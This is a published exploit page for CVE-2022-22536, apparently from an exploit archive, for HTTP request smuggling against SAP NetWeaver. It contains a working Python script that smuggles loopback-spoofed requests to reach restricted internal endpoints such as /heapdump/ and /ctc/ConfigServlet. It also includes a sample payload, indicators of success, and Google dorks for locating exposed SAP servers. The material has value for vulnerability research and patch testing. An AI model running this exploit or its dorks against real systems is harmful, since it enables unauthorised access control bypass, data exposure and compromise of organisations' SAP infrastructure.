c773b14d1c
6 changes to exploits/shellcodes/ghdb Mitel mitel-cs018 - Call Data Information Disclosure SAP NetWeaver - 7.53 - HTTP Request Smuggling ABB Cylon Aspect 3.08.01 - Remote Code Execution (RCE) ABB Cylon Aspect 3.08.01 - Arbitrary File Delete Elaine's Realtime CRM Automation 6.18.17 - Reflected XSS ProSSHD 1.2 - Denial of Service (DOS)
359 lines
No EOL
13 KiB
Text
359 lines
No EOL
13 KiB
Text
# Exploit Title: SAPGateBreaker Exploit - CVE-2022-22536 - HTTP Request Smuggling Through SAP's Front Door
|
|
# Google Dork: https://github.com/BecodoExploit-mrCAT/SAPGateBreaker-Exploit/blob/main/dorks
|
|
# Date: Tuesday, April 2, 2025
|
|
# Exploit Author: @C41Tx90 - Victor de Queiroz - Beco do Exploit - Elytron Security
|
|
# Vendor Homepage: https://community.sap.com/t5/technology-blogs-by-members/remediation-of-cve-2022-22536-request smuggling-and-request-concatenation/ba-p/13528083
|
|
# Software Link: https://help.sap.com/docs/SUPPORT_CONTENT/uiwits/3361892375.html
|
|
# Version: SAP NetWeaver Application Server ABAP, SAP NetWeaver
|
|
Application Server Java, ABAP Platform, SAP Content Server 7.53 and
|
|
SAP Web Dispatcher
|
|
# Tested on: Red Hat Enterprise Linux (RHEL)
|
|
# CVE : 2022-22536
|
|
https://github.com/BecodoExploit-mrCAT/SAPGateBreaker-Exploit
|
|
|
|
------
|
|
|
|
|
|
SAPGateBreaker - CVE-2022-22536 HTTP Request Smuggler
|
|
Author: @C41Tx90 - Victor de Queiroz | elytronsecurity.com |
|
|
becodoexploit.com
|
|
|
|
----------------------------------------------------------------------------
|
|
|
|
Target: SAP NetWeaver Application Server
|
|
Vulnerability: CVE-2022-22536
|
|
Exploit Type: HTTP Request Smuggling (Content-Length-based)
|
|
Impact: ACL Bypass, Internal Access
|
|
|
|
More information and explanations:
|
|
https://github.com/BecodoExploit-mrCAT/SAPGateBreaker-Exploit
|
|
|
|
----------------------------------------------------------------------------
|
|
|
|
Sample Payload:
|
|
----------------------------------------------------------------------------
|
|
|
|
GET /sap/admin/public/default.html HTTP/1.1
|
|
Host: 172.32.22.7:50000
|
|
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:136.0)
|
|
Gecko/20100101 Firefox/136.0
|
|
Accept: application/json, text/javascript, */*; q=0.01
|
|
Accept-Language: en-US,en;q=0.5
|
|
Accept-Encoding: gzip, deflate, br
|
|
Referer: http://172.32.22.7:50000/sap/admin/public/default.html
|
|
X-Requested-With: XMLHttpRequest
|
|
Connection: keep-alive
|
|
Cookie: saplb_*=(J2EE7364720)7364750
|
|
Authorization: Basic YTph
|
|
Content-Length: 89
|
|
|
|
0\r
|
|
\r
|
|
GET /heapdump/ HTTP/1.1\r
|
|
Host: 127.0.0.1\r
|
|
X-Forwarded-For: 127.0.0.1\r
|
|
\r
|
|
|
|
----------------------------------------------------------------------------
|
|
|
|
Expected Response:
|
|
----------------------------------------------------------------------------
|
|
|
|
HTTP/1.1 200 OK
|
|
server: SAP NetWeaver Application Server
|
|
last-modified: Tue, 01 Sep 2020 11:54:39 GMT
|
|
sap-cache-control: +3600
|
|
date: Tue, 01 Apr 2025 20:49:02 GMT
|
|
content-length: 4465
|
|
content-type: text/html
|
|
connection: Keep-Alive
|
|
x-dummy: 0
|
|
|
|
----------------------------------------------------------------------------
|
|
|
|
Indicators of Success:
|
|
- Status code 200 for internal endpoints
|
|
- Difference between direct access (403/404) and smuggled (200)
|
|
- Access to otherwise restricted SAP services via loopback injection
|
|
|
|
----------------------------------------------------------------------------
|
|
|
|
Example Paths Tested:
|
|
- /sap/public/bc/icf/info
|
|
- /sap/bc/webdynpro/sap/appl_soap_management
|
|
- /heapdump/
|
|
- /ctc/ConfigServlet
|
|
- /sap/public/bc/icf/logon.html
|
|
- /webdynpro/resources/sap.com/tc~lm~config~content/
|
|
|
|
----------------------------------------------------------------------------
|
|
SAP NetWeaver Application Server ABAP, SAP NetWeaver Application Server Java, ABAP Platform, SAP Content Server 7.53 and SAP Web Dispatcher are vulnerable for request smuggling and request concatenation. An unauthenticated attacker can prepend a victim's request with arbitrary data. This way, the attacker can execute functions impersonating the victim or poison intermediary Web caches. A successful attack could result in complete compromise of Confidentiality, Integrity and Availability of the system.
|
|
|
|
Google Dorks:
|
|
|
|
|
|
intitle:"SAP NetWeaver Application Server Java" inurl:/webdynpro/resources/
|
|
intitle:"SAP NetWeaver" "SAP J2EE Engine"
|
|
intitle:"Welcome to SAP NetWeaver" inurl:/irj/portal
|
|
intitle:"SAP NetWeaver Administrator" inurl:/nwa
|
|
inurl:"/sap/bc/webdynpro" -site:sap.com
|
|
inurl:"/sap/public" "SAP NetWeaver"
|
|
inurl:"/sap/admin/public/default.html"
|
|
inurl:"/webdynpro/welcome/Welcome.html"
|
|
inurl:"/sap/public/info.jsp"
|
|
"Powered by SAP NetWeaver" inurl:sap
|
|
intitle:"SAP Web Dispatcher Administration"
|
|
|
|
|
|
----------------------------------------------------------------------------
|
|
# Exploit
|
|
import argparse
|
|
import http.client
|
|
from urllib.parse import urlparse
|
|
from colorama import Fore, Style, Back, init
|
|
import os
|
|
|
|
init(autoreset=True)
|
|
|
|
BANNER = f"""
|
|
{Fore.WHITE}
|
|
+---------------------------+
|
|
(\__/\ Breaking the Gate |
|
|
{Style.BRIGHT}{Fore.WHITE}by{Style.RESET_ALL}
|
|
{Fore.YELLOW}@C41Tx90{Fore.WHITE} |
|
|
({Fore.RED}•{Fore.WHITE}デ{Fore.RED}•{Fore.WHITE})
|
|
{Style.BRIGHT}{Fore.YELLOW} CVE-2022-22536{Style.RESET_ALL} |
|
|
{Fore.GREEN}t.me/becodoxpl{Fore.WHITE} |
|
|
/ つ {Fore.WHITE}HTTP Request Smuggler |
|
|
{Fore.YELLOW}becodoexploit.com{Fore.WHITE} |
|
|
|
|
|
{Fore.LIGHTBLUE_EX}elytronsecurity.com{Fore.WHITE} |
|
|
+---------------------------+
|
|
"""
|
|
|
|
def detect_sap_version(host, port, is_https):
|
|
try:
|
|
conn_class = http.client.HTTPSConnection if is_https else
|
|
http.client.HTTPConnection
|
|
conn = conn_class(host, port, timeout=5)
|
|
conn.request("GET", "/")
|
|
res = conn.getresponse()
|
|
headers = {k.lower(): v for k, v in res.getheaders()}
|
|
server_header = headers.get("server", "Unknown")
|
|
print(f"{Fore.YELLOW}[*] {Fore.WHITE}Detected SAP Server
|
|
Header: {Fore.CYAN}{server_header}\n")
|
|
return server_header
|
|
except Exception as e:
|
|
print(f"{Fore.RED}[!] {Fore.WHITE}Could not determine SAP
|
|
version: {e}\n")
|
|
return "Unknown"
|
|
|
|
def build_smuggled_request(path):
|
|
return f"0\r\n\r\nGET {path} HTTP/1.1\r\nHost:
|
|
127.0.0.1\r\nX-Forwarded-For: 127.0.0.1\r\nConnection: close\r\n\r\n"
|
|
|
|
def try_file_read(host, port, is_https, verbose):
|
|
test_paths = [
|
|
"/sap/public/bc/icf/info",
|
|
"/sap/public/info.jsp",
|
|
"/sap/public/test/test.jsp",
|
|
"/sap/bc/webdynpro/sap/appl_soap_management",
|
|
"/sap/public/bc/soap/rfc",
|
|
"/webdynpro/welcome/Welcome.html",
|
|
"/sr_central",
|
|
"/useradmin/.jsp",
|
|
"/heapdump/",
|
|
"/startPage",
|
|
"/crossdomain.xml",
|
|
"/ctc/ConfigServlet",
|
|
"/webdynpro/resources/sap.com/tc~lm~config~content/",
|
|
"/sld",
|
|
"/sap/bc/webdynpro/sap/wdy_cfg_component_config",
|
|
"/sap/public/bc/icf/logon.html",
|
|
"/sap/bc/webdynpro/sap/itadmin",
|
|
"/sap/public/bc/sec/saml2",
|
|
"/sap/public/bc/webdav"
|
|
]
|
|
|
|
print(f"{Style.BRIGHT}{Fore.RED}[!] {Fore.WHITE}Proof of Concept
|
|
for ACL Bypass via HTTP Request Smuggling{Style.RESET_ALL}\n")
|
|
|
|
for path in test_paths:
|
|
try:
|
|
conn_class = http.client.HTTPSConnection if is_https else
|
|
http.client.HTTPConnection
|
|
conn = conn_class(host, port)
|
|
conn.request("GET", path)
|
|
res_direct = conn.getresponse()
|
|
content_direct = res_direct.read().decode(errors="ignore")
|
|
direct_status = res_direct.status
|
|
except Exception as e:
|
|
print(f"{Fore.RED}[!] {Fore.WHITE}Error checking direct
|
|
access for {path}: {e}")
|
|
continue
|
|
|
|
body = build_smuggled_request(path)
|
|
headers = {
|
|
"Host": f"{host}:{port}",
|
|
"Authorization": "Basic YTph",
|
|
"Cookie": "saplb_*=(J2EE7364720)7364750",
|
|
"Content-Type": "application/json",
|
|
"Content-Length": str(len(body.encode("utf-8")))
|
|
}
|
|
|
|
try:
|
|
conn = conn_class(host, port)
|
|
conn.request("POST", "/sap/admin/public/default.html",
|
|
body=body, headers=headers)
|
|
res = conn.getresponse()
|
|
smuggled_headers = res.getheaders()
|
|
content_smuggled = res.read().decode(errors="ignore")
|
|
smuggled_status = res.status
|
|
|
|
status_color = Fore.GREEN if smuggled_status !=
|
|
direct_status else Fore.RED
|
|
print(f"{status_color}[-] {Fore.LIGHTBLUE_EX}{path}
|
|
{Style.BRIGHT}{Fore.WHITE}Direct Access:
|
|
{Fore.YELLOW}({direct_status}) {Fore.WHITE}Smuggled Access:
|
|
{status_color}({smuggled_status}){Style.RESET_ALL}")
|
|
|
|
if smuggled_status == direct_status:
|
|
print(f"{Fore.RED}[x] {Fore.WHITE}Exploit did not work
|
|
for {path}\n")
|
|
|
|
with open("poc.txt", "a") as f:
|
|
f.write(f"\n--- Path: {path} ---\n")
|
|
f.write(f"Direct: {direct_status}\nSmuggled:
|
|
{smuggled_status}\n")
|
|
f.write(f"Smuggled Request:\nPOST
|
|
/sap/admin/public/default.html HTTP/1.1\n")
|
|
for k, v in headers.items():
|
|
f.write(f"{k}: {v}\n")
|
|
f.write(f"\n{body}\n")
|
|
f.write(f"Smuggled Response Headers:\n")
|
|
for h in smuggled_headers:
|
|
f.write(f"{h[0]}: {h[1]}\n")
|
|
if verbose:
|
|
f.write(f"\nSmuggled Response Body:\n{content_smuggled}\n")
|
|
f.write(f"\nDirect Response:\n{content_direct}\n")
|
|
|
|
if verbose:
|
|
print(f"\n{Fore.BLUE}>>> Sent Payload to
|
|
{path}:{Style.RESET_ALL}")
|
|
print(f"{Fore.CYAN}POST
|
|
/sap/admin/public/default.html HTTP/1.1")
|
|
for k, v in headers.items():
|
|
print(f"{Fore.CYAN}{k}: {v}")
|
|
print(f"\n{Fore.MAGENTA}{body.strip()}{Style.RESET_ALL}\n")
|
|
|
|
print(f"{Fore.BLUE}>>> Received Response:{Style.RESET_ALL}")
|
|
print(f"{Back.YELLOW if smuggled_status == 500
|
|
else Fore.CYAN}{Fore.WHITE}HTTP/1.1
|
|
{smuggled_status}{Style.RESET_ALL}")
|
|
for h in smuggled_headers:
|
|
print(f"{Fore.CYAN}{h[0]}: {h[1]}")
|
|
print(f"\n{Fore.CYAN}{content_smuggled}{Style.RESET_ALL}")
|
|
|
|
except Exception as e:
|
|
print(f"{Fore.RED}[!] {Fore.WHITE}Error smuggling to {path}: {e}")
|
|
|
|
def send_smuggled_request(target, verbose):
|
|
parsed = urlparse(target)
|
|
is_https = parsed.scheme == 'https'
|
|
port = parsed.port or (443 if is_https else 80)
|
|
host = parsed.hostname
|
|
|
|
print(BANNER)
|
|
print(f"{Fore.YELLOW}[*] {Fore.WHITE}Starting CVE-2022-22536
|
|
exploitation on {host}:{port}\n")
|
|
|
|
detect_sap_version(host, port, is_https)
|
|
|
|
body = build_smuggled_request("/sap/bc/webdynpro/sap/appl_soap_management")
|
|
headers = {
|
|
"Host": f"{host}:{port}",
|
|
"Authorization": "Basic YTph",
|
|
"Cookie": "saplb_*=(J2EE7364720)7364750",
|
|
"Content-Type": "application/json",
|
|
"Content-Length": str(len(body.encode("utf-8")))
|
|
}
|
|
|
|
conn_class = http.client.HTTPSConnection if is_https else
|
|
http.client.HTTPConnection
|
|
conn = conn_class(host, port)
|
|
|
|
try:
|
|
conn.request("POST", "/sap/admin/public/default.html",
|
|
body=body, headers=headers)
|
|
res = conn.getresponse()
|
|
content = res.read().decode(errors="ignore")
|
|
|
|
status_display = f"HTTP/{res.version/10:.1f} {res.status} {res.reason}"
|
|
is_exploit_success = res.status in [200, 500, 403, 302]
|
|
|
|
print(f"{Fore.GREEN if is_exploit_success else Fore.RED}[-]
|
|
{Fore.WHITE}Exploit executed{' successfully' if is_exploit_success
|
|
else ''}! {Fore.YELLOW}CVE-2022-22536")
|
|
print(f"{Fore.WHITE}{'-'*60}\n")
|
|
|
|
print(f"{Fore.BLUE}>>> Sent Payload:{Style.RESET_ALL}")
|
|
print(f"{Fore.CYAN}POST /sap/admin/public/default.html HTTP/1.1")
|
|
for k, v in headers.items():
|
|
print(f"{Fore.CYAN}{k}: {v}")
|
|
print(f"\n{Fore.MAGENTA}{body.strip()}{Style.RESET_ALL}\n")
|
|
|
|
print(f"{Fore.BLUE}>>> Received Response:{Style.RESET_ALL}")
|
|
print(f"{Back.YELLOW if res.status == 500 else
|
|
Fore.CYAN}{Fore.WHITE}{status_display}{Style.RESET_ALL}")
|
|
for h in res.getheaders():
|
|
print(f"{Fore.CYAN}{h[0]}: {h[1]}")
|
|
|
|
if verbose:
|
|
print(f"\n{Fore.CYAN}{content}{Style.RESET_ALL}")
|
|
|
|
with open("poc.txt", "w") as f:
|
|
f.write(f"Initial Request:\nPOST
|
|
/sap/admin/public/default.html HTTP/1.1\n")
|
|
for k, v in headers.items():
|
|
f.write(f"{k}: {v}\n")
|
|
f.write(f"\n{body}\n")
|
|
f.write(f"Initial Response:\n{status_display}\n")
|
|
for h in res.getheaders():
|
|
f.write(f"{h[0]}: {h[1]}\n")
|
|
f.write(f"\n{content}\n")
|
|
|
|
print("\n")
|
|
if is_exploit_success:
|
|
print(f"{Fore.GREEN}[=] {Fore.WHITE}The exploit executed
|
|
successfully and triggered an internal processing behavior. This
|
|
indicates a potential HTTP request smuggling condition.")
|
|
else:
|
|
print(f"{Fore.RED}[x] {Fore.WHITE}The exploit did not
|
|
trigger the expected behavior. Target may not be vulnerable.")
|
|
|
|
print(f"\n{Fore.WHITE}{'-'*60}\n")
|
|
|
|
try_file_read(host, port, is_https, verbose)
|
|
|
|
except Exception as e:
|
|
print(f"{Fore.RED}[!] {Fore.WHITE}Error sending initial request: {e}")
|
|
|
|
def main():
|
|
parser = argparse.ArgumentParser(description="CVE-2022-22536 Smuggling PoC")
|
|
parser.add_argument("-u", "--url", required=True, help="Target
|
|
full URL (e.g., http://host:port)")
|
|
parser.add_argument("--verbose", "-v", action="store_true",
|
|
help="Show full headers and responses")
|
|
args = parser.parse_args()
|
|
|
|
os.system('clear')
|
|
send_smuggled_request(args.url, args.verbose)
|
|
|
|
if __name__ == "__main__":
|
|
main()
|
|
|
|
|
|
----------------------------------------------------------------------------
|
|
https://nvd.nist.gov/vuln/detail/CVE-2022-22536
|
|
https://launchpad.support.sap.com/#/notes/3123396
|
|
https://blogs.sap.com/2022/02/08/patch-your-sap-netweaver-application-server-asap-cve-2022-22536/ |